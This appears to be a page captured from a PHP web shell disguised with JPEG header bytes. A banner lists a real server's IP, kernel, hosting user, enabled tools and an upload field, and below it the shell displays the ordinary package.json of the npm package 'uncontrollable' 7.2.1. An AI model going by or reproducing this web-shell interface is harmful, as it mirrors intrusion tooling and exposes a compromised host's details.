ÿØÿà JPEG ÿþ;
Server IP : 68.65.120.201 / Your IP : 216.73.216.68 Web Server : LiteSpeed System : Linux server179.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64 User : taxhyuvu ( 2294) PHP Version : 8.1.32 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/taxhyuvu/nodevenv/public_html/dp_taxhelplines/14/lib/node_modules/uncontrollable/ |
Upload File : |
{ "_from": "uncontrollable@^7.2.1", "_id": "uncontrollable@7.2.1", "_inBundle": false, "_integrity": "sha512-svtcfoTADIB0nT9nltgjujTi7BzVmwjZClOmskKu/E8FW9BXzg9os8OLr4f8Dlnk0rYWJIWr4wv9eKUXiQvQwQ==", "_location": "/uncontrollable", "_phantomChildren": {}, "_requested": { "type": "range", "registry": true, "raw": "uncontrollable@^7.2.1", "name": "uncontrollable", "escapedName": "uncontrollable", "rawSpec": "^7.2.1", "saveSpec": null, "fetchSpec": "^7.2.1" }, "_requiredBy": [ "/@restart/ui", "/react-bootstrap" ], "_resolved": "https://registry.npmjs.org/uncontrollable/-/uncontrollable-7.2.1.tgz", "_shasum": "1fa70ba0c57a14d5f78905d533cf63916dc75738", "_spec": "uncontrollable@^7.2.1", "_where": "/home/taxhyuvu/nodevenv/dp_taxhelplines/14/lib/node_modules/react-bootstrap", "author": { "name": "Jason Quense", "email": "monastic.panic@gmail.com" }, "bugs": { "url": "https://github.com/jquense/uncontrollable/issues" }, "bundleDependencies": false, "dependencies": { "@babel/runtime": "^7.6.3", "@types/react": ">=16.9.11", "invariant": "^2.2.4", "react-lifecycles-compat": "^3.0.4" }, "deprecated": false, "description": "Wrap a controlled react component, to allow specific prop/handler pairs to be uncontrolled", "devDependencies": { "@4c/build": "^2.0.1", "@4c/semantic-release-config": "^2.0.3", "@4c/tsconfig": "^0.3.0", "@babel/cli": "^7.6.4", "@babel/core": "^7.6.4", "@babel/preset-typescript": "^7.6.0", "@typescript-eslint/eslint-plugin": "^2.5.0", "@typescript-eslint/parser": "^2.5.0", "babel-core": "^7.0.0-0", "babel-jest": "^24.9.0", "babel-preset-jason": "^6.0.1", "cpy": "^7.3.0", "enzyme": "^3.10.0", "enzyme-adapter-react-16": "^1.15.1", "eslint": "^6.6.0", "eslint-config-4catalyzer-typescript": "^1.1.0", "eslint-config-jason": "^6.1.0", "eslint-config-prettier": "^6.5.0", "eslint-plugin-import": "^2.18.2", "eslint-plugin-react": "^7.16.0", "jest": "^24.9.0", "prop-types": "^15.7.2", "react": "^16.11.0", "react-dom": "^16.11.0", "release-script": "^1.0.2", "rimraf": "^3.0.0", "typescript": "^3.6.4" }, "homepage": "https://github.com/jquense/uncontrollable#readme", "jest": { "rootDir": "./test" }, "keywords": [ "uncontrolled-component", "react-component", "input", "controlled", "uncontrolled", "form" ], "license": "MIT", "main": "lib/cjs/index.js", "module": "lib/esm/index.js", "name": "uncontrollable", "peerDependencies": { "react": ">=15.0.0" }, "publishConfig": { "directory": "lib" }, "repository": { "type": "git", "url": "git+https://github.com/jquense/uncontrollable.git" }, "scripts": { "build": "build src", "lint": "eslint src test", "prepublishOnly": "npm run build", "tdd": "jest --watch", "test": "jest" }, "version": "7.2.1" }